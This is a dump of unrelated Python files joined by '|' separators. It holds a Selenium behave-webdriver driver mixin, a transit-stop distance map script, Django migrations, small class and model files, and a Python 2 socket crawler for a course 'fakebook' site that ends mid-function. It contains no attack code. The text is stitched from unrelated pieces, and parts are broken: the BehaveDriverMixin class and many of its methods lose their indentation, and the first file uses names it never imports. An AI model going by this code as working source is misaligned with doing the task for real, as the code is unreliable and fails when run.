from behave_webdriver.conditions import (element_is_present,
element_is_selected,
element_contains_value,
element_is_visible,
element_contains_text,
element_is_enabled)
class Select(_Select):
    """selenium ``Select`` extended with selection by arbitrary attribute."""

    def select_by_attr(self, attr, attr_value):
        """Select every <option> whose *attr* attribute equals *attr_value*.

        For single-select elements only the first match is selected.

        :raises NoSuchElementException: when no option matches.
        """
        css = 'option[{} ={}]'.format(attr, self._escapeString(attr_value))
        opts = self._el.find_elements(By.CSS_SELECTOR, css)
        matched = False
        for opt in opts:
            self._setSelected(opt)
            matched = True
            if not self.is_multiple:
                return
        if not matched:
            # Fixed typo in the error message ("attribue" -> "attribute").
            raise NoSuchElementException("Cannot locate option by {} attribute with value of '{}'".format(attr,
                                                                                                          attr_value))
class BehaveDriverMixin(object):
"""
Implements most of the general (I.E. not browser-specific) logic for step implementations.
Intended to be used with subclasses of any selenium webdriver.
>>> from behave_webdriver.driver import BehaveDriverMixin
>>> from somewhere import SomeDriver
>>> class MyBehaveDriver(BehaveDriverMixin, SomeDriver):
... pass
>>> behave_driver = MyBehaveDriver()
>>> behave_driver.get('https://github.com/spyoungtech/behave-webdriver')
Can also be used with other mixins designed for selenium, such as selenium-requests
>>> from behave_webdriver.driver import BehaveDriverMixin
>>> from seleniumrequests import RequestMixin
>>> from selenium import webdriver
>>> class BehavingRequestDriver(BehaveDriverMixin, RequestMixin, webdriver.Chrome):
... pass
>>> behave_driver = BehavingRequestDriver()
>>> response = behave_driver.request('GET', 'https://github.com/spyoungtech/behave-webdriver')
"""
_driver_name = ''
def __init__(self, *args, **kwargs):
default_wait = kwargs.pop('default_wait', 1.5)
super(BehaveDriverMixin, self).__init__(*args, **kwargs)
self.default_wait = default_wait
def wait(self, wait_time=None):
if wait_time is None:
wait_time = self.default_wait
return WebDriverWait(self, wait_time)
@property
def alert(self):
"""
Property shortcut for an ``Alert`` object for the driver
Note: this will return an Alert instance regardless of whether or not there is actually an alert present.
Use ``has_alert`` to check whether or not there is an alert currently present.
:return: an selenium.webdriver.common.alert.Alert instance
"""
return self.switch_to.alert
@property
def screen_size(self):
"""
Property for the current driver window size. Can also be set by assigning an x/y tuple.
:return: tuple of the screen dimensions (x, y)
"""
size = self.get_window_size()
x = size['width']
y = size['height']
return (x, y)
@screen_size.setter
def screen_size(self, size):
"""
:param size: The dimensions to set the screen to in (x, y) format.
:type size: tuple
:return:
"""
x, y = size
if x is None:
x = self.screen_size[0]
if y is None:
y = self.screen_size[1]
self.set_window_size(x, y)
@property
def cookies(self):
"""
Shortcut for driver.get_cookies()
"""
return self.get_cookies()
@property
def has_alert(self):
"""
Whether or not there is currently an alert present
:return: True if there is an alert present, else False
:rtype: bool
"""
try:
WebDriverWait(self, 1).until(EC.alert_is_present())
alert = self.switch_to.alert
return True
except TimeoutException:
return False
@property
def primary_handle(self):
"""
shortcut for window_handles[0]
:returns: the primary (first) window handle
"""
return self.window_handles[0]
@property
def secondary_handles(self):
"""
shortcut for window_handles[1:]
:returns: list of window handles
:rtype: list
"""
if len(self.window_handles) > 1:
return self.window_handles[1:]
else:
return []
@property
def last_opened_handle(self):
return self.window_handles[-1]
def get_element(self, selector, by=None):
"""
Takes a selector string and uses an appropriate method (XPATH or CSS selector by default) to find a WebElement
The optional `by` argument can be supplied to specify any locating method explicitly.
This is used to resolve selectors from step definition strings to actual element objects
:param selector: The selector to use, an XPATH or CSS selector
:type selector: str
:param by: alternate method used to locate element, e.g. (By.id) See selenium.webdriver.common.by.By attributes
:return: WebElement object
"""
if by:
return self.find_element(by, selector)
if selector.startswith('/'):
return self.find_element_by_xpath(selector)
else:
return self.find_element_by_css_selector(selector)
def get_element_text(self, element):
    """
    Takes in a selector, finds the element, and extracts the text.

    When present on the WebElement, the element's 'value' property is returned (useful for
    reading the current text of input elements). Otherwise the contained text (elem.text) is returned.

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :return: the text contained within the element.
    :rtype: str
    """
    elem = self.get_element(element)
    value = elem.get_property('value')
    return elem.text if value is None else value
def get_element_attribute(self, element, attr, css=False, expected_value=None):
    """
    Get the value of an attribute or css attribute from an element.

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :param attr: The attribute to lookup
    :type attr: str
    :param css: Whether or not this is a CSS attribute
    :type css: bool
    :param expected_value: only used when ``css`` is True; when supplied, both
        the actual and expected values are returned (normalized to ``Color``
        objects when they parse as colors)
    :return: the attribute value, or a ``(value, expected_value)`` tuple when
        ``css`` is True and ``expected_value`` is truthy
    """
    elem = self.get_element(element)
    if css:
        value = elem.value_of_css_property(attr)
        # Normalize color strings so comparisons are format-insensitive
        # (e.g. 'rgb(...)' vs '#rrggbb').
        if self.is_color(value):
            value = Color.from_string(value)
        # NOTE(review): this branch changes the return type to a tuple —
        # callers must handle both shapes.
        if expected_value:
            if self.is_color(expected_value):
                expected_value = Color.from_string(expected_value)
            return value, expected_value
    else:
        value = elem.get_attribute(attr)
    return value
def get_element_size(self, element):
    """
    Returns a dictionary containing the size information of an element.

    The dictionary has two keys: 'width' and 'height' which represent the size of the element dimensions in px

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :return: A dictionary with size information
    :rtype: dict
    """
    return self.get_element(element).size
def get_element_location(self, element):
    """
    Gets the location of the element in the renderable canvas.

    This is a dict with two keys: 'x' and 'y'

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :return: the element's location
    :rtype: dict
    """
    return self.get_element(element).location
def open_url(self, url):
    """
    Navigate to an absolute URL

    Behaves same as ``driver.get`` but serves as a common entry-point for subclasses wanting to change this.

    :param url: an absolute URL including the scheme
    :type url: str
    :return: whatever ``driver.get`` returns
    """
    return self.get(url)
def element_exists(self, element):
    """
    Whether or not an element exists. Attempts to locate the element using `get_element`;
    returns True if the element was found, False if it couldn't be located.

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :return: True if the element could be found, False if it couldn't be found
    :rtype: bool
    """
    try:
        self.get_element(element)
    except NoSuchElementException:
        # The element was not able to be located
        return False
    return True
def element_visible(self, element):
    """
    Checks if an element is visible or not.

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :return: True if the element is visible, else False
    :rtype: bool
    """
    return self.get_element(element).is_displayed()
def element_in_viewport(self, element):
    """
    Determines the bounding box (rect) of the window and rect of the element.

    This information is used to determine whether or not the element is *completely* within the viewport;
    partial overlap counts as NOT in viewport.

    :param element: CSS Selector or XPATH used to locate the element
    :return: True if the element lies entirely inside the viewport
    """
    elem = self.get_element(element)
    left = elem.location.get('x')
    top = elem.location.get('y')
    right = left + elem.size.get('width')
    bottom = top + elem.size.get('height')
    # Query window scroll offsets and client size (same order as the element reads above).
    win_top = self.execute_script('return window.pageYOffset')
    win_left = self.execute_script('return window.pageXOffset')
    win_width = self.execute_script('return document.documentElement.clientWidth')
    win_height = self.execute_script('return document.documentElement.clientHeight')
    win_right = win_left + win_width
    win_bottom = win_top + win_height
    return (win_left <= left and right <= win_right
            and win_top <= top and bottom <= win_bottom)
def element_enabled(self, element):
    """
    Checks if an element is enabled or not.

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :return: True if the element is enabled, else False
    :rtype: bool
    """
    return self.get_element(element).is_enabled()
def element_focused(self, element):
    """Return True if *element* is the currently focused (active) element."""
    elem = self.get_element(element)
    return elem == self.switch_to.active_element
def element_selected(self, element):
    """
    Checks if an element is selected or not.

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :return: True if the element is selected, else False
    :rtype: bool
    """
    return self.get_element(element).is_selected()
def element_contains(self, element, value):
    """
    Checks if an element contains (in value/text) a given string/value

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :param value: the text/value to check for
    :type value: str
    :return: True or False, whether or not the value was found in the element.
    :rtype: bool
    """
    elem = self.get_element(element)
    # Prefer the 'value' property (inputs); fall back to contained text.
    prop = elem.get_property('value')
    return value in (elem.text if prop is None else prop)
def element_has_class(self, element, cls):
    """
    Checks whether or not an element has a particular css class.

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :param cls: The css class to check for
    :type cls: str
    :return: True if the element has the specified class, else False
    :rtype: bool
    """
    # Substring check against the raw class attribute string.
    return cls in self.get_element(element).get_attribute('class')
def click_element(self, element):
    """
    Click on an element. Note: this will not trigger some doubleclick events, even when n=2 with any delay.
    Instead, if you want to doubleclick, use `doubleclick_element`

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    """
    self.get_element(element).click()
def doubleclick_element(self, element):
    """
    Double click an element

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :return:
    """
    target = self.get_element(element)
    # ActionChains methods return the chain, so build and fire in one expression.
    ActionChains(self).double_click(target).perform()
def click_link_text(self, text, partial=False):
    """
    Click on a link, located by matching the text contained in the link. If ``partial`` is True,
    the link is located by partial text.

    :param text: The text contained in the link, used to locate the element.
    :type text: str
    :param partial: Whether or not to match link by partial text (as opposed to full match)
    :type partial: bool
    :return:
    """
    finder = (self.find_element_by_partial_link_text if partial
              else self.find_element_by_link_text)
    finder(text).click()
def drag_element(self, element, to_element):
    """
    Drag an element to the location of another element.

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :param to_element: the selector used to locate the destination element
    :type to_element: str
    :return:
    """
    source = self.get_element(element)
    destination = self.get_element(to_element)
    ActionChains(self).drag_and_drop(source, destination).perform()
def submit(self, element):
    """
    Shortcut for submitting an element

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :return:
    """
    self.get_element(element).submit()
def send_keys(self, keys):
    """
    Send arbitrary keys to the page. Note: this is different than sending keys directly to an element.

    :param keys: keys to send
    :return:
    """
    ActionChains(self).send_keys(keys).perform()
def press_button(self, button):
    """
    Send a keystroke simulating the press of a given button. You can use keys as strings (e.g. 'a', 'z') or any
    key names (e.g. the 'escape' key). When the length of the button argument is greater than one character,
    names are checked against selenium.webdriver.common.keys.Keys first.

    :param button: A single character or key name
    :type button: str
    :return:
    """
    # Multi-character names resolve through Keys; unknown names pass through unchanged.
    key = getattr(Keys, button.upper(), button) if len(button) > 1 else button
    self.send_keys(key)
def scroll_to_bottom(self):
    """
    Scrolls the current window to the bottom of the window (0, document.body.scrollHeight).
    """
    # Delegates entirely to JavaScript in the page context.
    self.execute_script("window.scrollTo(0, document.body.scrollHeight);")
def scroll_to_element(self, element):
    """
    Scroll to the location of an element.

    :param element: CSS Selector or XPATH used to locate the element
    :return:
    """
    location = self.get_element_location(element)
    self.scroll_to(location['x'], location['y'])
def scroll_to(self, x, y):
    """
    Scroll to a particular (x, y) coordinate.

    :param x: the x coordinate to scroll to.
    :type x: int
    :param y: the y coordinate to scroll to.
    :type y: int
    :return:
    """
    # int() coercion prevents script injection through the coordinates.
    self.execute_script('window.scrollTo({}, {});'.format(int(x), int(y)))
def move_to_element(self, element, offset=None):
    """
    Moves the mouse to the middle of an element

    :param element: CSS Selector or XPATH used to locate the element
    :type element: str
    :param offset: optional tuple of x/y offsets to offset mouse from center
    :type offset: tuple
    :return:
    """
    target = self.get_element(element)
    chain = ActionChains(self)
    if offset:
        chain = chain.move_to_element_with_offset(target, offset[0], offset[1])
    else:
        chain = chain.move_to_element(target)
    chain.perform()
def pause(self, milliseconds):
    """
    Pause for a number of milliseconds.

    ``time.sleep`` is used here due to issues with w3c browsers and the ActionChain pause feature.

    :param milliseconds: number of milliseconds to wait
    :type milliseconds: int
    :return:
    """
    # Convert to seconds, keeping millisecond precision.
    time.sleep(round(milliseconds / 1000, 3))
def wait_for_element_condition(self, element, ms, negative, condition):
    """
    Wait on an element until a certain condition is met, up to a maximum amount of time to wait.

    :param element: CSS Selector or XPATH used to locate the element
    :param ms: maximum time (in milliseconds) to wait for the condition to be true
    :param negative: whether or not to check for the negation of the condition; coerced to bool
    :param condition: phrase naming the condition to check for; defaults to presence of the element
    :return: the wait's result on success, or None if the wait timed out
    """
    # NOTE(review): any falsy ms (including an explicit 0) falls back to the
    # default wait — confirm 0 is never a meaningful timeout for callers.
    if not ms:
        seconds = self.default_wait
    else:
        seconds = round(ms / 1000, 3)
    # Maps step-definition phrases to expected-condition factories
    # (the element_is_* / element_contains_* helpers defined elsewhere in this module).
    condition_text_map = {
        'be checked': element_is_selected,
        'be enabled': element_is_enabled,
        'be selected': element_is_selected,
        'be visible': element_is_visible,
        'contain a text': element_contains_text,
        'contain a value': element_contains_value,
        'exist': element_is_present,
    }
    if condition:
        expected = condition_text_map[condition]
    else:
        expected = element_is_present
    # Leading '/' means XPATH, anything else is treated as a CSS selector.
    if element.startswith('/'):
        locator = (By.XPATH, element)
    else:
        locator = (By.CSS_SELECTOR, element)
    wait = WebDriverWait(self, seconds)
    try:
        result = wait.until(expected(locator, negative=bool(negative)))
    except TimeoutException:
        # Timeouts are reported as None rather than raised to the caller.
        result = None
    return result
def select_option(self, select_element, by, by_arg):
    """
    Implements features for selecting options in Select elements. Uses selenium's ``Select`` support class.

    :param select_element: CSS Selector or XPATH used to locate the select element containing options
    :param by: the method for selecting the option, valid options include any select_by_X supported by ``Select``.
    :type by: str
    :param by_arg: the argument passed to the chosen select_by_* method
    :return:
    """
    select_elem = self.get_element(select_element)
    select = Select(select_elem)
    # Unknown 'by' values fall back to selecting by an arbitrary attribute.
    # NOTE(review): 'select_by_attr' is not part of selenium's stock Select —
    # presumably Select here is a project subclass; confirm.
    select_method = getattr(select, 'select_by_'+by, partial(select.select_by_attr, by))
    select_method(by_arg)
@staticmethod
def is_color(str_):
    """
    Whether or not the string represents a color understood by selenium's ``Color``.

    :param str_: candidate color string
    :return: True if parsable as a color, else False
    """
    try:
        Color.from_string(str_)
    except ValueError:
        return False
    return True
class Chrome(BehaveDriverMixin, webdriver.Chrome):
    """
    Chrome driver class. Alternate constructors and browser-specific logic is implemented here.
    """
    _driver_name = 'chromedriver'

    @classmethod
    def headless(cls, *args, **kwargs):
        """Alternate constructor that ensures headless flags on the Chrome options."""
        options = kwargs.pop('chrome_options', None)
        if options is None:
            options = ChromeOptions()
        for flag in ('--headless', '--disable-gpu'):
            options.add_argument(flag)
        kwargs['chrome_options'] = options
        return cls(*args, **kwargs)
class PhantomJS(BehaveDriverMixin, webdriver.PhantomJS):
    """
    PhantomJS driver class. Alternate constructors and browser-specific logic is implemented here.

    No PhantomJS-specific behavior is required; everything comes from the mixin.
    """
    pass
class Firefox(BehaveDriverMixin, webdriver.Firefox):
    """
    Firefox driver class. Alternate constructors and browser-specific logic is implemented here.

    Several overrides below work around geckodriver quirks: window handles are
    refreshed by explicitly re-switching to the current window, and native
    doubleclick/move events are preceded by scrolling (doubleclick is
    dispatched via a JavaScript shim).
    """
    _driver_name = 'geckodriver'
    @classmethod
    def headless(cls, *args, **kwargs):
        # Alternate constructor: guarantee '--headless' is present on the options.
        firefox_options = kwargs.pop('firefox_options', None)
        if firefox_options is None:
            firefox_options = FirefoxOptions()
        firefox_options.add_argument('--headless')
        kwargs['firefox_options'] = firefox_options
        return cls(*args, **kwargs)
    @property
    def secondary_handles(self):
        # Re-focus the current window so window_handles reflects reality.
        self.switch_to.window(self.current_window_handle)
        try:
            # FIXME: there must be a better way
            # Give a just-opened window up to 1s to register its handle.
            self.wait(1).until(EC.new_window_is_opened(self.window_handles))
            self.switch_to.window(self.current_window_handle)
        except TimeoutException:
            pass
        return super(Firefox, self).secondary_handles
    @property
    def last_opened_handle(self):
        # Same refresh trick as secondary_handles before delegating.
        self.switch_to.window(self.current_window_handle)
        return super(Firefox, self).last_opened_handle
    def click_element(self, element):
        # Scroll first: Firefox won't click elements outside the viewport.
        self.scroll_to_element(element)
        super(Firefox, self).click_element(element)
    def doubleclick_element(self, element):
        """
        Overrides the doubleclick method to first scroll to element, and adds JS shim for doubleclick
        """
        self.scroll_to_element(element)
        elem = self.get_element(element)
        # Synthesize the dblclick event in-page instead of via ActionChains.
        script = ("var evObj = new MouseEvent('dblclick', {bubbles: true, cancelable: true, view: window}); "
                  " arguments[0].dispatchEvent(evObj);")
        self.execute_script(script, elem)
    def move_to_element(self, element, offset=None):
        # Scroll to the bottom first, then back to the element, before moving the mouse.
        self.scroll_to_bottom()
        self.scroll_to_element(element)
        super(Firefox, self).move_to_element(element, offset=offset)
class Ie(BehaveDriverMixin, webdriver.Ie):
    """
    Ie driver class. Alternate constructors and browser-specific logic is implemented here.
    """
    # Executable name used to locate the driver binary.
    _driver_name = 'IEDriverServer'
class Edge(BehaveDriverMixin, webdriver.Edge):
    """
    Edge driver class. Alternate constructors and browser-specific logic is implemented here.
    """
    # Executable name used to locate the driver binary.
    _driver_name = 'msedgedriver'
class Opera(BehaveDriverMixin, webdriver.Opera):
    """
    Opera driver class. Alternate constructors and browser-specific logic is implemented here.

    All behavior comes from the mixin; no Opera-specific overrides are needed.
    """
class Safari(BehaveDriverMixin, webdriver.Safari):
    """
    Safari driver class. Alternate constructors and browser-specific logic is implemented here.
    """
    # Executable name used to locate the driver binary.
    _driver_name = 'safaridriver'
class BlackBerry(BehaveDriverMixin, webdriver.BlackBerry):
    """
    BlackBerry driver class. Alternate constructors and browser-specific logic is implemented here.

    All behavior comes from the mixin; no BlackBerry-specific overrides are needed.
    """
class Android(BehaveDriverMixin, webdriver.Android):
    """
    Android driver class. Alternate constructors and browser-specific logic is implemented here.

    All behavior comes from the mixin; no Android-specific overrides are needed.
    """
class Remote(BehaveDriverMixin, webdriver.Remote):
    """
    Remote driver class. Alternate constructors and browser-specific logic is implemented here.

    All behavior comes from the mixin; no Remote-specific overrides are needed.
    """
|
import argparse
from da_manager import DaData
from data_manager import dataman_factory
from plotter import Plotter
from plotter import ATTR
class Runner(object):
    """For every 100m raster cell of each dissemination area, compute the distance to
    the closest active transit stop, colour cells by distance, and write an HTML map."""

    def __init__(self, args):
        # CLI args: dataset name and distance method ("grid" or "crow").
        self._dataset = args.dataset
        self._method = args.method
        self._daman = DaData()
        self._dataman = dataman_factory(self._dataset, link_route_shapes=False, link_stops=True)

    def run(self):
        plotter = Plotter()
        saskatoon_bb = self._daman.get_saskatoon_bounding_box()
        plotter.add_polygon(saskatoon_bb)
        active_stops = self._dataman.get_active_stops()
        result = []
        das = self._daman.get_das()
        for da in das:
            # 100m raster cells for this dissemination area.
            rasters = da.get_rasters(100)
            # print "# of rasters:", len(rasters)
            for raster in rasters:
                min_dist, min_stop = raster.get_closest_stop(active_stops, method=self._method)
                result.append((raster, min_dist))
        total_dist = 0
        for item in result:
            dist = item[1]
            raster = item[0]
            total_dist += dist
            p = raster.get_polygon()
            # Fade fill from opaque red at 0 m to fully transparent at >= 500 m.
            opacity = 1 - dist / 500.0
            if opacity < 0:
                opacity = 0
            p.set_attribute(ATTR.FILL_COLOR, "#ff0000")
            p.set_attribute(ATTR.FILL_OPACITY, opacity)
            p.set_attribute(ATTR.STROKE_WEIGHT, 0)
            p.set_attribute(ATTR.STROKE_COLOR, "#202020")
            p.set_attribute(ATTR.STROKE_OPACITY, 0)
            plotter.add_polygon(p)
        print "Ave dist:", total_dist / float(len(result))
        plotter.plot("temp/maps/plot_distance_%s_%s.html" % (self._dataset, self._method))
if __name__ == "__main__":
    # CLI entry point: both arguments are required.
    parser = argparse.ArgumentParser(description='Compute and plot ave dist to closest stop')
    parser.add_argument("-d", "--dataset", help="Dataset", type=str, required=True)
    parser.add_argument("-m", "--method", help="Distance method: grid/crow", type=str, required=True)
    args = parser.parse_args()
    runner = Runner(args)
    runner.run()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Squashed initial migration for the scrub_csv app (replaces 0001-0006)."""

    replaces = [(b'scrub_csv', '0001_initial'), (b'scrub_csv', '0002_auto_20150414_0300'), (b'scrub_csv', '0003_auto_20150414_0301'), (b'scrub_csv', '0004_auto_20150414_0309'), (b'scrub_csv', '0005_uploader_user'), (b'scrub_csv', '0006_auto_20150414_1446')]
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Document',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('file_name', models.CharField(max_length=200)),
                ('upload_date', models.DateTimeField(verbose_name=b'date uploaded')),
            ],
        ),
        migrations.CreateModel(
            name='Record',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('row', models.PositiveIntegerField()),
                ('doc_key', models.CharField(max_length=200)),
                ('doc_value', models.CharField(default=b'', max_length=200)),
                ('document', models.ForeignKey(to='scrub_csv.Document')),
            ],
        ),
        migrations.CreateModel(
            name='Uploader',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('user', models.OneToOneField(default=0, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.AddField(
            model_name='document',
            name='uploader',
            field=models.ForeignKey(to='scrub_csv.Uploader'),
        ),
        # The squashed history renamed file_name -> csvfile, dropped it,
        # then re-added file_name with a non-null default.
        migrations.RenameField(
            model_name='document',
            old_name='file_name',
            new_name='csvfile',
        ),
        migrations.RemoveField(
            model_name='document',
            name='csvfile',
        ),
        migrations.AddField(
            model_name='document',
            name='file_name',
            field=models.CharField(default=1, max_length=200),
            preserve_default=False,
        ),
    ]
|
# Generated by Django 3.1.5 on 2021-02-15 13:26
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    """Auto-generated migration altering created_date defaults on blog models."""

    dependencies = [
        ('blog', '0004_auto_20210211_1747'),
    ]
    operations = [
        # NOTE(review): these defaults are frozen timestamps captured when the
        # migration was generated (Django warning W161); the model likely
        # intended a callable such as timezone.now — confirm in blog/models.py.
        migrations.AlterField(
            model_name='comment',
            name='created_date',
            field=models.DateTimeField(default=datetime.datetime(2021, 2, 15, 13, 26, 8, 456720, tzinfo=utc)),
        ),
        migrations.AlterField(
            model_name='post',
            name='created_date',
            field=models.DateTimeField(default=datetime.datetime(2021, 2, 15, 13, 26, 8, 455720, tzinfo=utc)),
        ),
    ]
|
from category import Category
class Expense(Category):
    """A Category subclass tagged with type 'Expense'."""

    def __init__(self, amount, name, date):
        super().__init__(amount, name, date)
        # Tag appended to the string/repr forms below.
        self.type = 'Expense'

    def __str__(self):
        return '{} - {}'.format(super().__str__(), self.type)

    def __repr__(self):
        return '{} - {}'.format(super().__repr__(), self.type)

    def __eq__(self, other):
        # NOTE(review): delegating straight to the parent makes this override
        # redundant, and defining __eq__ without __hash__ makes Expense
        # unhashable in Python 3 even if Category is hashable — confirm intended.
        return super().__eq__(other)
if __name__ == '__main__':
    # BUG FIX: this guard previously called main(), which is not defined
    # anywhere in this module, so running the file directly raised NameError.
    # Run a minimal smoke demo of the Expense class instead.
    print(Expense(10.0, 'demo', '2021-01-01'))
class Thing(object):
    """Base game entity carrying hit points and a per-hit damage value."""

    def __init__(self, health, damage):
        self.health = health
        self.damage = damage

    def accept(self, _):
        """Visitor hook: take one hit, reducing health by this unit's damage.

        The visitor argument is accepted but ignored.
        """
        self.health = self.health - self.damage
class Marine(Thing):
    """Marine unit: 100 HP, takes 21 damage per hit."""
    def __init__(self):
        super(Marine, self).__init__(100, 21)
class Marauder(Thing):
    """Marauder unit: 125 HP, takes 32 damage per hit."""
    def __init__(self):
        super(Marauder, self).__init__(125, 32)
class TankBullet:
    """Marker/projectile type with no state or behavior of its own."""
    pass
|
# Database models live in this module.
from exts import db
from datetime import datetime
class User(db.Model):
    """Registered user account."""
    # BUG FIX: was misspelled '__tablenme__'. SQLAlchemy ignores unknown
    # dunder names, so the intended table name was silently never applied.
    __tablename__ = 'user'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    telephone = db.Column(db.String(11), nullable=False)
    username = db.Column(db.String(50), nullable=False)
    password = db.Column(db.String(100), nullable=False)
class Question(db.Model):
    """A question posted by a user."""
    # BUG FIX: was misspelled '__tablenme__' (see User).
    __tablename__ = 'question'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    title = db.Column(db.String(1000), nullable=False)
    content = db.Column(db.Text, nullable=False)
    # datetime.now (no parentheses) is evaluated per-insert;
    # datetime.now() would freeze one import-time timestamp for every row.
    create_time = db.Column(db.DateTime, default=datetime.now)
    author_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    author = db.relationship('User', backref=db.backref('questions'))
# Comments-to-question is one-to-many; a single user can also post many comments.
class Answer(db.Model):
    """A comment/answer attached to a question."""
    # BUG FIX: was misspelled '__tablenme__' (see User).
    __tablename__ = 'answer'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    comment = db.Column(db.Text, nullable=False)
    create_time = db.Column(db.DateTime, default=datetime.now)
    question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
    author_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    # order_by=id.desc(): newest answers first when read via question.answers.
    question = db.relationship('Question', backref=db.backref('answers', order_by=id.desc()))
    auth = db.relationship('User', backref=db.backref('answers'))
|
#!/usr/bin/env python
import socket
import sys
import ssl
import time
from HTMLParser import HTMLParser
from htmlentitydefs import name2codepoint
urlText = []  # text nodes collected by the parser from the last page fed to it
attributes_url = []  # /fakebook/ hrefs found in the most recently parsed page
Main_url_list = []  # global crawl frontier of not-yet-visited paths
class MyHTMLParser(HTMLParser):
    """HTML parser that collects page text into the module-global ``urlText``
    and every anchor href under /fakebook/ into ``attributes_url``."""
    #def handle_starttag(self, tag, attrs):
        #print "Start tag:", tag
        #for attr in attrs:
            #print " attr:", attr
    def handle_starttag(self, tag, attrs):
        # Only parse the 'anchor' tag.
        if tag == "a":
            # Check the list of defined attributes.
            for name, value in attrs:
                # If href is defined, print it.
                if name == "href" and value.startswith("/fakebook/"):
                    print name, "=", value
                    attributes_url.append(value)
    #def handle_endtag(self, tag):
        #print "End tag :", tag
    def handle_data(self, data):
        #print "Data :", data
        # Skip bare newlines between tags; keep all other text nodes.
        if data != '\n':
            urlText.append(data)
    #def handle_comment(self, data):
        #print "Comment :", data
    def handle_entityref(self, name):
        # Decode named entities (e.g. &amp;); the result is currently unused.
        c = unichr(name2codepoint[name])
        #print "Named ent:", c
    def handle_charref(self, name):
        # Decode numeric character references (hex or decimal); unused.
        if name.startswith('x'):
            c = unichr(int(name[1:], 16))
        else:
            c = unichr(int(name))
        #print "Num ent :", c
    #def handle_decl(self, data):
        #print "Decl :", data
parser = MyHTMLParser()  # single module-level parser instance reused across all requests
def Send_GET_request(sock,URL,csrf_token,session_id_POST):
    """Issue a GET for *URL* over the already-connected socket, reusing the
    session cookies, and return the raw response bytes."""
    # NOTE(review): HTTP/1.1 headers should be terminated with \r\n, not \n —
    # this works against the course server but is not spec-compliant.
    Get_request = "GET " + URL + " HTTP/1.1\n"
    Get_request += "Host: cs5700sp17.ccs.neu.edu\n"
    # session_id_POST[:-1] strips the trailing character of the cookie value.
    Get_request += "Cookie: {0} {1}\n\n".format(csrf_token,session_id_POST[:-1])
    print(Get_request)
    sock.send(Get_request)
    # Single recv: assumes the whole response fits in one 12362-byte read.
    data = sock.recv(12362)
    print(data)
    return data
def Create_main_queue(current_url):
    """Merge newly discovered links into the global frontier, keeping only
    paths longer than 10 characters (filters out the /fakebook/ root)."""
    global Main_url_list
    merged = set(Main_url_list) | set(current_url)
    Main_url_list = [url for url in merged if len(url) > 10]
def Crawl(sock,parser,data,csrf_token,session_id_POST):
    """Recursively crawl: parse *data* for links, merge them into the global
    frontier, fetch the next frontier entry, and recurse until empty.

    NOTE(review): recursion depth grows with the number of pages crawled —
    a deep site will hit Python's recursion limit; an iterative loop would be safer.
    """
    print("==================== Start of crwling function ======================================\n\n")
    global urlText
    global attributes_url
    global Main_url_list
    # Reset per-page link accumulator before feeding the new page.
    attributes_url = []
    parser.feed(data)
    #print(attributes_url)
    Create_main_queue(attributes_url)
    print(Main_url_list)
    parser.close()
    #Get the flag if there
    #return condition to break recursion
    if len(Main_url_list) == 0:
        return
    print("==================== New GET request Start ======================================\n\n")
    data = Send_GET_request(sock,Main_url_list[0],csrf_token,session_id_POST)
    # Only drop the frontier entry if the fetch produced data.
    if data != 0:
        Main_url_list.pop(0)
    print("==================== New GET request End ======================================\n\n")
    Crawl(sock,parser,data,csrf_token,session_id_POST)
    return
    #attributes_url = []
    #parser.feed(data)
    #print(attributes_url)
    # NOTE(review): unreachable — sits after the unconditional return above.
    print("========================== End of crwling function ================================\n\n")
'''
Get_request = "GET " + attributes_url[1] + " HTTP/1.1\n"
Get_request += "Host: cs5700sp17.ccs.neu.edu\n"
Get_request += "Cookie: {0} {1}\n\n".format(csrf_token,session_id_POST[:-1])
print(Get_request)
sock.send(Get_request)
data = sock.recv(12362)
print(data)
attributes_url = []
parser.feed(data)
print(attributes_url)
print("==========================================================\n\n")
parser.close()
Get_request = "GET " + attributes_url[2] + " HTTP/1.1\n"
Get_request += "Host: cs5700sp17.ccs.neu.edu\n"
Get_request += "Cookie: {0} {1}\n\n".format(csrf_token,session_id_POST[:-1])
print(Get_request)
sock.send(Get_request)
data = sock.recv(12362)
print(data)
print("==========================================================\n\n")
'''
def StartCrawling(sock,server_address):
    """Log in to fakebook over a raw socket, then start the recursive crawl.

    Flow: GET the login page and harvest the csrf/session cookies from fixed
    header positions, POST the credentials, re-read the session cookie, GET
    the fakebook landing page, and hand the response to Crawl().
    """
    # print(server_address)
    sock.connect(server_address)
    global urlText
    global attributes_url
    Get_request = """GET http://cs5700f16.ccs.neu.edu/ HTTP/1.0\n
\n"""
    # sock.send(Get_request)
    # data = sock.recv(10256)
    # print(data)
    Get_request = """GET http://cs5700f16.ccs.neu.edu/fakebook/ HTTP/1.0\n
\n"""
    #sock.send(Get_request)
    #data = sock.recv(10256)
    #print(data)
    # Fetch the login page to obtain the csrf token and session cookie.
